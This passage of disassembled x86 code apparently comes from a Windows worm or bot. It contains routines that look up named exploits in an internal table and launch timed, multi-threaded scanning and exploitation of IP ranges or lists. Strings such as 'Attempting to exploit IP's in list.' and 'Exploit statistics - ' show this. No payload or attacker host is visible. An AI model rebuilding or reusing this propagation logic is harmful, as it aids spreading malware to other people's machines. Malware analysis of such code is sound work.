cmp [ebp+var_112], eax
jz short loc_4133B1
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_4133B1: ; CODE XREF: sub_41331E+6A�j
; sub_41331E+7E�j
cmp [ebp+var_8A], 1
jnz short loc_4133E0
lea eax, [ebp+var_6]
push eax
push [ebp+var_10E]
call sub_404552
pop ecx
pop ecx
push offset dword_41EF48
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_4133E0: ; CODE XREF: sub_41331E+9A�j
cmp [ebp+var_8A], 2
jnz short loc_413420
push 0Ah
lea eax, [ebp+var_6]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_10A]
push eax
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_413420: ; CODE XREF: sub_41331E+C9�j
call sub_412D4C
push eax
lea eax, [ebp+var_6]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41EF48
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_413444: ; CODE XREF: sub_41331E+C0�j
; sub_41331E+100�j
lea eax, [ebp+var_14C]
push eax
call [ebp+var_11A]
cmp [ebp+var_8A], 1
jnz short loc_41346F
push [ebp+var_10E]
push [ebp+var_14C]
call sub_412A3A
pop ecx
pop ecx
jmp short loc_41348A
; ---------------------------------------------------------------------------
loc_41346F: ; CODE XREF: sub_41331E+13A�j
cmp [ebp+var_8A], 2
jnz short loc_41348A
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_86]
push eax
call sub_412BC9
pop ecx
pop ecx
loc_41348A: ; CODE XREF: sub_41331E+14F�j
; sub_41331E+158�j
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
locret_413498: ; CODE XREF: sub_41331E+5E�j
; sub_41331E+8E�j
leave
retn 4
sub_41331E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41349C proc near ; DATA XREF: sub_413AB0+1F4�o
var_774 = qword ptr -774h
var_764 = qword ptr -764h
var_75C = byte ptr -75Ch
var_65C = byte ptr -65Ch
var_658 = dword ptr -658h
var_654 = dword ptr -654h
var_650 = dword ptr -650h
var_64C = byte ptr -64Ch
var_648 = byte ptr -648h
var_644 = dword ptr -644h
var_640 = byte ptr -640h
var_62C = dword ptr -62Ch
var_628 = dword ptr -628h
var_624 = byte ptr -624h
var_51C = byte ptr -51Ch
var_50E = dword ptr -50Eh
var_50A = dword ptr -50Ah
var_506 = dword ptr -506h
var_502 = byte ptr -502h
var_37B = byte ptr -37Bh
var_37A = byte ptr -37Ah
var_377 = byte ptr -377h
var_36B = byte ptr -36Bh
var_36A = byte ptr -36Ah
var_35C = dword ptr -35Ch
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_341 = byte ptr -341h
var_296 = dword ptr -296h
var_20C = byte ptr -20Ch
var_20B = byte ptr -20Bh
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 764h
push edi
push 2C9h
push [ebp+arg_0]
lea eax, [ebp+var_628]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_51C]
push eax
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_4134F5
push 14Ch
push 0
lea eax, [ebp+var_358]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4135BF
; ---------------------------------------------------------------------------
loc_4134F5: ; CODE XREF: sub_41349C+3C�j
and [ebp+var_62C], 0
jmp short loc_41350B
; ---------------------------------------------------------------------------
loc_4134FE: ; CODE XREF: sub_41349C:loc_4135BA�j
mov eax, [ebp+var_62C]
inc eax
mov [ebp+var_62C], eax
loc_41350B: ; CODE XREF: sub_41349C+60�j
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
lea eax, [ebp+var_640]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_640]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_640]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_4135BA
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CCD0
mov [ebp+var_358], eax
push 3Ah
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
lea eax, [ebp+var_354]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_354]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_341]
push eax
call sub_4105FB
pop ecx
and [ebp+var_296], 0
lea eax, [ebp+var_341]
push eax
lea eax, [ebp+var_51C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4135BF
; ---------------------------------------------------------------------------
loc_4135BA: ; CODE XREF: sub_41349C+B0�j
jmp loc_4134FE
; ---------------------------------------------------------------------------
loc_4135BF: ; CODE XREF: sub_41349C+54�j
; sub_41349C+11C�j
lea eax, [ebp+var_624]
push eax
call sub_40806A
pop ecx
test eax, eax
jnz short loc_4135E3
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_4135E3: ; CODE XREF: sub_41349C+132�j
mov al, byte_41DE30
mov [ebp+var_20C], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_20B]
rep stosd
stosw
stosb
mov al, byte_41DE30
mov [ebp+var_108], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_107]
rep stosd
stosw
stosb
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
test eax, eax
jnz short loc_41364D
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_41364D: ; CODE XREF: sub_41349C+19C�j
push [ebp+var_506]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413675
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_413675: ; CODE XREF: sub_41349C+1C4�j
cmp [ebp+var_358], 0
jz loc_413782
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413782
call sub_4042FB
mov [ebp+var_644], eax
cmp [ebp+var_644], 0
jz short loc_4136B6
mov [ebp+var_296], 2
jmp short loc_4136C0
; ---------------------------------------------------------------------------
loc_4136B6: ; CODE XREF: sub_41349C+20C�j
mov [ebp+var_296], 3
loc_4136C0: ; CODE XREF: sub_41349C+218�j
movsx eax, [ebp+var_36B]
test eax, eax
jz short loc_4136E5
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_4136E5
mov [ebp+var_296], 1
loc_4136E5: ; CODE XREF: sub_41349C+22D�j
; sub_41349C+23D�j
movsx eax, [ebp+var_37B]
test eax, eax
jz short loc_4136FA
mov [ebp+var_296], 2
loc_4136FA: ; CODE XREF: sub_41349C+252�j
movsx eax, [ebp+var_37A]
test eax, eax
jz short loc_41370F
mov [ebp+var_296], 3
loc_41370F: ; CODE XREF: sub_41349C+267�j
cmp [ebp+var_296], 3
jnz short loc_41372B
cmp [ebp+var_644], 0
jz short loc_41372B
mov [ebp+var_296], 2
loc_41372B: ; CODE XREF: sub_41349C+27A�j
; sub_41349C+283�j
cmp [ebp+var_296], 3
jnz short loc_413782
mov al, [ebp+var_36A]
mov [ebp+var_64C], al
mov al, [ebp+var_377]
mov [ebp+var_648], al
mov [ebp+var_36A], 1
and [ebp+var_377], 0
push 0
lea eax, [ebp+var_502]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_64C]
mov [ebp+var_36A], al
mov al, [ebp+var_648]
mov [ebp+var_377], al
loc_413782: ; CODE XREF: sub_41349C+1E0�j
; sub_41349C+1F4�j ...
push offset dword_41E2D8
call sub_409C6C
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset dword_41CE78
mov eax, [ebp+var_628]
add eax, 14h
push eax
call sub_416B5E ; sprintf
add esp, 14h
push offset dword_41E2D8
call sub_409C7A
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
mov eax, [ebp+var_628]
push dword ptr [eax]
push offset dword_41CE40
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 18h
cmp [ebp+var_358], 0
jnz short loc_413807
push 3E8h
call ds:dword_41709C ; Sleep
loc_413807: ; CODE XREF: sub_41349C+35E�j
and [ebp+var_10C], 0
call sub_416B64 ; clock
mov [ebp+var_35C], eax
and [ebp+var_4], 0
loc_41381D: ; CODE XREF: sub_41349C+3F9�j
; sub_41349C+44B�j ...
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jnz short loc_413847
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jb short loc_41384C
loc_413847: ; CODE XREF: sub_41349C+38B�j
jmp loc_413A43
; ---------------------------------------------------------------------------
loc_41384C: ; CODE XREF: sub_41349C+3A9�j
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
push offset dword_41EF48
lea eax, [ebp+var_20C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_413897
jmp short loc_41381D
; ---------------------------------------------------------------------------
loc_413897: ; CODE XREF: sub_41349C+3F7�j
push [ebp+var_8]
push 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_650], eax
cmp [ebp+var_650], 0
jz short loc_4138EC
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jnb short loc_4138EC
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_4138EC: ; CODE XREF: sub_41349C+42B�j
; sub_41349C+449�j
push [ebp+var_50A]
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_413A35
loc_413909: ; CODE XREF: sub_41349C+4BA�j
; sub_41349C:loc_413A30�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_654], eax
cmp [ebp+var_654], 0
jnz short loc_413926
jmp loc_413A35
; ---------------------------------------------------------------------------
loc_413926: ; CODE XREF: sub_41349C+483�j
mov eax, [ebp+var_10C]
inc eax
mov [ebp+var_10C], eax
cmp [ebp+var_358], 0
jz short loc_4139B7
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_658], eax
cmp [ebp+var_658], 0
jnz short loc_413958
jmp short loc_413909
; ---------------------------------------------------------------------------
loc_413958: ; CODE XREF: sub_41349C+4B8�j
push 14Ch
lea eax, [ebp+var_358]
push eax
push [ebp+var_658]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_658]
mov ecx, [ebp+var_654]
mov [eax+3Eh], ecx
push [ebp+var_658]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4139A5
push [ebp+var_658]
call sub_416B4C ; free
pop ecx
jmp short loc_4139B5
; ---------------------------------------------------------------------------
loc_4139A5: ; CODE XREF: sub_41349C+4F9�j
push [ebp+var_8]
push [ebp+var_654]
call sub_404D9B
pop ecx
pop ecx
loc_4139B5: ; CODE XREF: sub_41349C+507�j
jmp short loc_413A30
; ---------------------------------------------------------------------------
loc_4139B7: ; CODE XREF: sub_41349C+49E�j
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jz short loc_4139C5
jmp short loc_413A35
; ---------------------------------------------------------------------------
loc_4139C5: ; CODE XREF: sub_41349C+525�j
lea eax, [ebp+var_75C]
push eax
push [ebp+var_654]
call sub_4044F7
pop ecx
pop ecx
mov al, [ebp+var_36A]
mov [ebp+var_65C], al
and [ebp+var_36A], 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_75C]
push eax
push offset dword_41CE2C
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_65C]
mov [ebp+var_36A], al
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_4]
add eax, 3E8h
mov [ebp+var_4], eax
loc_413A30: ; CODE XREF: sub_41349C:loc_4139B5�j
jmp loc_413909
; ---------------------------------------------------------------------------
loc_413A35: ; CODE XREF: sub_41349C+467�j
; sub_41349C+485�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_413A43: ; CODE XREF: sub_41349C:loc_413847�j
push [ebp+var_10C]
call sub_416B64 ; clock
sub eax, [ebp+var_35C]
mov dword ptr [ebp+var_764], eax
and dword ptr [ebp+var_764+4], 0
fild [ebp+var_764]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+774h+var_774]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset unk_41CDE8
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
loc_413AAB: ; CODE XREF: sub_41349C+142�j
; sub_41349C+1AC�j ...
pop edi
leave
retn 4
sub_41349C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AB0 proc near ; CODE XREF: sub_40A9CF+BCB�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
cmp [ebp+arg_4], 0
jz short loc_413AC2
cmp [ebp+arg_8], 0
jnz short loc_413AC7
loc_413AC2: ; CODE XREF: sub_413AB0+A�j
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AC7: ; CODE XREF: sub_413AB0+10�j
push [ebp+arg_8]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_413AEB
push [ebp+arg_8]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_413AE9
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AE9: ; CODE XREF: sub_413AB0+32�j
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413AEB: ; CODE XREF: sub_413AB0+25�j
and [ebp+var_14], 0
jmp short loc_413AF8
; ---------------------------------------------------------------------------
loc_413AF1: ; CODE XREF: sub_413AB0:loc_413B43�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_413AF8: ; CODE XREF: sub_413AB0+3F�j
mov eax, [ebp+var_14]
imul eax, 3Ah
movsx eax, byte_41CCD0[eax]
test eax, eax
jnz short loc_413B0E
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413B0E: ; CODE XREF: sub_413AB0+57�j
mov eax, [ebp+var_14]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_28]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_413B43
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413B43: ; CODE XREF: sub_413AB0+8F�j
jmp short loc_413AF1
; ---------------------------------------------------------------------------
loc_413B45: ; CODE XREF: sub_413AB0:loc_413AE9�j
; sub_413AB0+91�j
cmp [ebp+arg_C], 0
jz short loc_413B59
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_2C], eax
jmp short loc_413B60
; ---------------------------------------------------------------------------
loc_413B59: ; CODE XREF: sub_413AB0+99�j
mov [ebp+var_2C], 15180h
loc_413B60: ; CODE XREF: sub_413AB0+A7�j
mov eax, [ebp+var_2C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_413B75
cmp [ebp+var_4], 15180h
jbe short loc_413B7C
loc_413B75: ; CODE XREF: sub_413AB0+BA�j
mov [ebp+var_4], 15180h
loc_413B7C: ; CODE XREF: sub_413AB0+C3�j
cmp [ebp+arg_10], 0
jz short loc_413B90
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_30], eax
jmp short loc_413B97
; ---------------------------------------------------------------------------
loc_413B90: ; CODE XREF: sub_413AB0+D0�j
mov [ebp+var_30], 7D0h
loc_413B97: ; CODE XREF: sub_413AB0+DE�j
mov eax, [ebp+var_30]
mov [ebp+var_C], eax
cmp [ebp+var_C], 32h
jb short loc_413BAC
cmp [ebp+var_C], 0EA60h
jbe short loc_413BB3
loc_413BAC: ; CODE XREF: sub_413AB0+F1�j
mov [ebp+var_C], 7D0h
loc_413BB3: ; CODE XREF: sub_413AB0+FA�j
cmp [ebp+arg_14], 0
jz short loc_413BC7
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_34], eax
jmp short loc_413BCE
; ---------------------------------------------------------------------------
loc_413BC7: ; CODE XREF: sub_413AB0+107�j
mov [ebp+var_34], 100h
loc_413BCE: ; CODE XREF: sub_413AB0+115�j
mov eax, [ebp+var_34]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_413BE3
cmp [ebp+var_10], 200h
jbe short loc_413BEA
loc_413BE3: ; CODE XREF: sub_413AB0+128�j
mov [ebp+var_10], 100h
loc_413BEA: ; CODE XREF: sub_413AB0+131�j
push 2C9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413C03
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413C03: ; CODE XREF: sub_413AB0+14C�j
push 108h
push [ebp+arg_4]
mov eax, [ebp+var_8]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 0Eh
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+11Ah], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov [eax+11Eh], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_10]
mov [eax+122h], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 126h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_10]
push [ebp+var_C]
mov eax, [ebp+var_8]
push dword ptr [eax+11Ah]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
mov eax, [ebp+var_8]
add eax, 4
push eax
push offset unk_41CEA4
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_41349C
call sub_4095A4
add esp, 24h
locret_413CB1: ; CODE XREF: sub_413AB0:loc_413AC2�j
; sub_413AB0+34�j ...
leave
retn
sub_413AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413CB3 proc near ; DATA XREF: sub_413FE7+5C�o
var_49C = dword ptr -49Ch
var_498 = byte ptr -498h
var_494 = byte ptr -494h
var_490 = dword ptr -490h
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_469 = byte ptr -469h
var_3BE = dword ptr -3BEh
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = byte ptr -32Ch
var_1AC = byte ptr -1ACh
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_21 = byte ptr -21h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_330]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset unk_41CF50
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_334], 0
and [ebp+var_484], 0
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
lea eax, [ebp+var_32C]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
loc_413D21: ; CODE XREF: sub_413CB3:loc_413FA8�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
and [ebp+var_488], 0
jmp short loc_413D44
; ---------------------------------------------------------------------------
loc_413D37: ; CODE XREF: sub_413CB3+23B�j
; sub_413CB3:loc_413F77�j
mov eax, [ebp+var_488]
inc eax
mov [ebp+var_488], eax
loc_413D44: ; CODE XREF: sub_413CB3+82�j
mov eax, [ebp+var_488]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz loc_413F7C
push 3Ah
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
lea eax, [ebp+var_47C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CCD0
mov [ebp+var_480], eax
lea eax, [ebp+var_47C]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_469]
push eax
call sub_4105FB
pop ecx
cmp [ebp+var_480], 0
jz loc_413E9A
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413E9A
call sub_4042FB
mov [ebp+var_490], eax
cmp [ebp+var_490], 0
jz short loc_413DE9
mov [ebp+var_3BE], 2
jmp short loc_413DF3
; ---------------------------------------------------------------------------
loc_413DE9: ; CODE XREF: sub_413CB3+128�j
mov [ebp+var_3BE], 3
loc_413DF3: ; CODE XREF: sub_413CB3+134�j
movsx eax, [ebp+var_15]
test eax, eax
jz short loc_413E15
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_413E15
mov [ebp+var_3BE], 1
loc_413E15: ; CODE XREF: sub_413CB3+146�j
; sub_413CB3+156�j
movsx eax, [ebp+var_25]
test eax, eax
jz short loc_413E27
mov [ebp+var_3BE], 2
loc_413E27: ; CODE XREF: sub_413CB3+168�j
movsx eax, [ebp+var_24]
test eax, eax
jz short loc_413E39
mov [ebp+var_3BE], 3
loc_413E39: ; CODE XREF: sub_413CB3+17A�j
cmp [ebp+var_3BE], 3
jnz short loc_413E55
cmp [ebp+var_490], 0
jz short loc_413E55
mov [ebp+var_3BE], 2
loc_413E55: ; CODE XREF: sub_413CB3+18D�j
; sub_413CB3+196�j
cmp [ebp+var_3BE], 3
jnz short loc_413E9A
mov al, [ebp+var_14]
mov [ebp+var_498], al
mov al, [ebp+var_21]
mov [ebp+var_494], al
mov [ebp+var_14], 1
and [ebp+var_21], 0
push 0
lea eax, [ebp+var_1AC]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_498]
mov [ebp+var_14], al
mov al, [ebp+var_494]
mov [ebp+var_21], al
loc_413E9A: ; CODE XREF: sub_413CB3+FC�j
; sub_413CB3+110�j ...
movsx eax, [ebp+var_13]
neg eax
sbb eax, eax
and eax, 1388h
add eax, 1388h
push eax
push 0
lea eax, [ebp+var_469]
push eax
push [ebp+var_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_48C], eax
cmp [ebp+var_48C], 0
jz loc_413F77
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_49C], eax
cmp [ebp+var_49C], 0
jnz short loc_413EF3
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413EF3: ; CODE XREF: sub_413CB3+239�j
push 14Ch
lea eax, [ebp+var_480]
push eax
push [ebp+var_49C]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_484]
inc eax
mov [ebp+var_484], eax
mov eax, [ebp+var_49C]
mov ecx, [ebp+var_48C]
mov [eax+3Eh], ecx
push [ebp+var_49C]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_413F59
push [ebp+var_48C]
call sub_4053B1
pop ecx
push [ebp+var_49C]
call sub_416B4C ; free
pop ecx
jmp short loc_413F77
; ---------------------------------------------------------------------------
loc_413F59: ; CODE XREF: sub_413CB3+28A�j
lea eax, [ebp+var_47C]
push eax
push [ebp+var_8]
push offset dword_41CF20
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 10h
loc_413F77: ; CODE XREF: sub_413CB3+21B�j
; sub_413CB3+2A4�j
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413F7C: ; CODE XREF: sub_413CB3+A1�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413F9A
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413F9A: ; CODE XREF: sub_413CB3+2E3�j
mov eax, [ebp+var_330]
cmp dword ptr [eax+4], 0
jz short loc_413FA8
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413FA8: ; CODE XREF: sub_413CB3+2F1�j
jmp loc_413D21
; ---------------------------------------------------------------------------
loc_413FAD: ; CODE XREF: sub_413CB3+2E5�j
; sub_413CB3+2F3�j
push [ebp+var_334]
push [ebp+var_484]
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset dword_41CEDC
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 14h
push [ebp+var_330]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_413CB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FE7 proc near ; CODE XREF: sub_40A9CF+B5B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_413FF3
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_413FF3: ; CODE XREF: sub_413FE7+8�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414009
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_414009: ; CODE XREF: sub_413FE7+1E�j
push 180h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset aAttemptingToEx ; "Attempting to exploit IP's in list."
push 0
push [ebp+var_4]
push offset sub_413CB3
call sub_4095A4
add esp, 10h
locret_414050: ; CODE XREF: sub_413FE7+A�j
; sub_413FE7+20�j
leave
retn
sub_413FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414052 proc near ; DATA XREF: sub_41417D+35�o
var_3C0 = dword ptr -3C0h
var_3BC = byte ptr -3BCh
var_225 = byte ptr -225h
var_224 = byte ptr -224h
var_218 = byte ptr -218h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3C0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_3C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset aExploitStatist ; "Exploit statistics - "
lea eax, [ebp+var_200]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and [ebp+var_204], 0
jmp short loc_4140A4
; ---------------------------------------------------------------------------
loc_414097: ; CODE XREF: sub_414052:loc_41414A�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
loc_4140A4: ; CODE XREF: sub_414052+43�j
mov eax, [ebp+var_204]
imul eax, 3Ah
movsx eax, byte_41CCD0[eax]
test eax, eax
jz loc_41414F
push 12h
mov eax, [ebp+var_204]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
lea eax, [ebp+var_218]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_218]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_200]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_204]
imul eax, 3Ah
push dword_41CCFA[eax]
push offset dword_41CFA4
lea eax, [ebp+var_200]
push eax
